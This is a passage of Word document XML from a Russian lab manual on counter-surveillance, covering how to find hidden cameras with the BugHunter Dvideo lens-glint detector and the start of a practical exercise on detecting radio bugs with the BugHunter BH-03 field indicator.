            <wp:wrapNone/>
            <wp:docPr id="17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8010"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Default="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">                    а)                </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">   б)                                        в)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>Рисунок 4 – вид блика камеры в объективе прибора (а – камера, скрытая в светильнике; б – камера в дамской сумочке;  в – камера видеонаблюдения в магазине)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="337AB7"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1889760" cy="2385060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Рисунок 47" descr="Описание: Типичная камера видео-наблюдения">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Типичная камера видео-наблюден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9760" cy="2385060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B45DB0">
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="337AB7"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3581400" cy="2385060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Рисунок 46" descr="Описание: Вид на камеру видео-наблюдения через окно объектива обнаружителя BugHunter Dvideo">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Вид на камеру видео-наблюдения через окно объектива обнаружителя BugHunter Dvide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2385060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Segoe UI" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Типичная камера видео-наблюдения (слева) и вид на неё в глазок обнаружителя "BugHunter Dvideo" (справа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2819400" cy="1874520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Рисунок 49" descr="Описание: Камера видеонаблюдения, спрятанная в сумке">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Камера видеонаблюдения, спрятанная в сумк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1874520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00A04C73">
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2682240" cy="2385060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Рисунок 48" descr="Описание: Вид на камеру видеонаблюдения, спрятанную в сумке, через окно объектива обнаружителя BugHunter Dvideo">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Вид на камеру видеонаблюдения, спрятанную в сумке, через окно объектива обнаружителя BugHunter Dvide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2240" cy="2385060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00A04C73">
        <w:t>Камера видеонаблюдения, спрятанная в сумке (слева), и вид на неё в глазок обнаружителя "BugHunter Dvideo" (справа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>2.2.8 Выключение изделия производится нажатием и удержанием кнопки, расположенной на задней панели, не менее 2 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00A04C73">
        <w:t>Текущий ремонт. Виды возможных неисправностей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00A04C73">
        <w:t>Характерные неисправности и методы их устранения представлены в  таблице 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00A04C73">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1E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3724"/>
        <w:gridCol w:w="2728"/>
        <w:gridCol w:w="3050"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="414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Описание неисправности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296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Возможные причины</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334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Методы устранения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4140" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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 xml:space="preserve">При включении изделия </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:rPr>
                <w:lang w:val="x-none"/>
              </w:rPr>
              <w:t>светодиоды</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:t>, расположенные</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:rPr>
                <w:lang w:val="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve"> на задней</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:t xml:space="preserve"> панели, вспыхивают</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:rPr>
                <w:lang w:val="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve"> на короткое время</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:rPr>
                <w:lang w:val="x-none"/>
              </w:rPr>
              <w:t>и</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:t xml:space="preserve"> изделие вык</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:rPr>
                <w:lang w:val="x-none"/>
              </w:rPr>
              <w:t>лючается</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C73">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00A04C73">
              <w:t>Либо изделие не включается.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296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Разряжены аккумуляторные батареи.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334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 xml:space="preserve">Зарядить аккумуляторные батареи. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296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Неисправно изделие</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334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Отправить изделие в ремонт</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="006816EE" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="006816EE">
        <w:t>Задание к работе</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="006816EE">
        <w:t>оиск скрытых видеокамер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">Основным правилом при выявлении скрытых камер является то, что поиск необходимо вести в месте, которое вероятнее всего заинтересует лиц, установивших скрытую видеокамеру. Наиболее вероятными местами установки видеокамер являются те, с которых хорошо просматриваются рабочие места сотрудников, места отдыха (кресла, диваны и т.п.), дверные проемы. Камера может быть </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">установлена в полости подвесного потолка, в углах помещений, вентиляционной шахте, элементах мебели (шкаф, антресоль и т.п.), предметах бытового назначения, аудио- видеотехнике и пр. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>Необходимо учитывать, что видеокамер может быть несколько. Обнаружение одной или двух видеокамер не дает право сделать вывод, что помещение полностью очищено. Чтобы быть полностью уверенным в своей безопасности, необходимо проверить все места, из которых возможна скрытая съемка.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">Определить, что за блик Вы видите,  — объектив скрытой камеры или просто отражение на гладкой поверхности (например, стекло или зеркало) — можно немного сместившись в сторону и продолжая при этом наблюдать ту же самую область с помощью работающего детектора. В этом случае простой блик пропадет, сместится или значительно изменит интенсивность, тогда как яркая точка от объектива камеры останется на том же месте и практически не будет изменять интенсивность свечения до тех пор, пока вы будете оставаться в поле обзора камеры. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>Ещё необходимо помнить об оптимальной рабочей дистанции, которая составляет не более 18 метров, и о том, что обнаружить камеру можно только находясь в поле ее обзора. Следовательно, для большей достоверности контроля рекомендуется осмотреть наиболее подозрительные места с разных ракурсов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>Задания для выполнения лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t xml:space="preserve">Во время работы с прибором  необходимо обнаружить и отразить в отчете найденные камеры: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>IP-камера для помещений Link 128;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>Видеоглазок беспроводной  Radio DVR;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>Видеокамера малогабаритная  JMC T-12;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A1004" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>Видеорегистратор LawMate PV-550SE с камерой 618СА.</w:t>
      </w:r>
      <w:r>
        <w:t>(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00604F51" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc508029578"/>
      <w:bookmarkStart w:id="31" w:name="_Toc3808618"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:t xml:space="preserve">Практическая работа №10. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Исследование помещений на предмет обнаружения в ближней зоне скрытых радиопередатчиков с помощью индикатора поля Expert BugHunter BH-03</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00E80DD7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Цель работы:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1004">
        <w:t xml:space="preserve"> научится применять </w:t>
      </w:r>
      <w:r w:rsidRPr="005A1004">
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>индикатор поля Expert BugHunter BH-03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>обнаружения в ближней зоне радиопередающих устройств</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="009D109D">
        <w:t xml:space="preserve">BugHunter BH-03 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>является портативным прибором, предназначенным для обнаружения в ближней зоне радиопередающих устройств - беспроводных «жучков», радиомикрофонов, скрытых беспроводных видеокамер, раций, работающих сотовых телефонов, подавителей и глушителей сотовой связи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>Внешний вид представлен ниже.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1546860" cy="2964180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Рисунок 51" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image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6860" cy="2964180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Технические характеристики:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Точное соответствие заявленным параметрам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Охват всего возможного диапазона частот, на котором работают беспроводные «жучки» (от 10 до 3500МГц).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Высокая чувствительность (во всем заявленном частотном диапазоне).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Расширенный динамический диапазон.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Возможность обнаружения как аналоговых, так и цифровых беспроводных «жучков» (коротких импульсов)!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Автоматическая подстройка под фоновый уровень излучения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>OLED-дисплей для наглядного отображения характера принимаемого сигнала, а также истории измерений за последние 45 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Наличие отключаемых фильтров на несколько частотных диапазонов передачи базовых станций сотовой связи (GSM900/1800,3G,4G,CDMA450), атак же Wi-Fi (позволяет успешно вести поиск «жучков» в сложных реалиях современного города, где эфир "загрязнен"помехами).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Наличие виброиндикации (отключаемой) и возможность подключения наушников (для скрытого предупреждения о наличии беспроводных «жучков»),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:lastRenderedPageBreak/>
        <w:t>Несколько звуковых режимов (акустоиндикация, акустозавязка, беззвучный режим).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Возможность применения перезаряжаемых элементов питания и встроенное в изделие зарядное устройство.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Возможность работы в режимах поиска и охраны.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Наличие внешней выдвижной антенны (позволяетувеличить чувствительность прибора).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Наличие индикации разряда батареи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Самодиагностика.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Возможность обнаружения подавителей сотовой связи и других радиочастот.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00E80DD7" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DD7">
        <w:t>Разработка и производство изделия осуществляются в России с использованием высококачественной комплектации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
